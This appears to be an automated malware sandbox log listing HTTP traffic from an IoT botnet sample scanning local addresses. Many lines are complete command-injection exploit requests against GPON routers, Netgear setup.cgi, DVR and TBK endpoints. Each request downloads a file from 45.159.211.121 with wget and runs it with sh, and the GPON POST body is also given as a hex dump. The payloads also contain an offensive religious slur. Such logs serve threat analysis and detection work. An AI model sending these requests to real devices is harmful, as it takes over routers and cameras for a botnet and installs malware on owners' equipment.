Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.183Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.187Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.198Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.217Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.215Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.219.150.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.219.150.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.219.150.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.219.150.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.219.150.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.219.150.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.219.150.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.186Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.186Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.107Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.107Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.171Connection: close
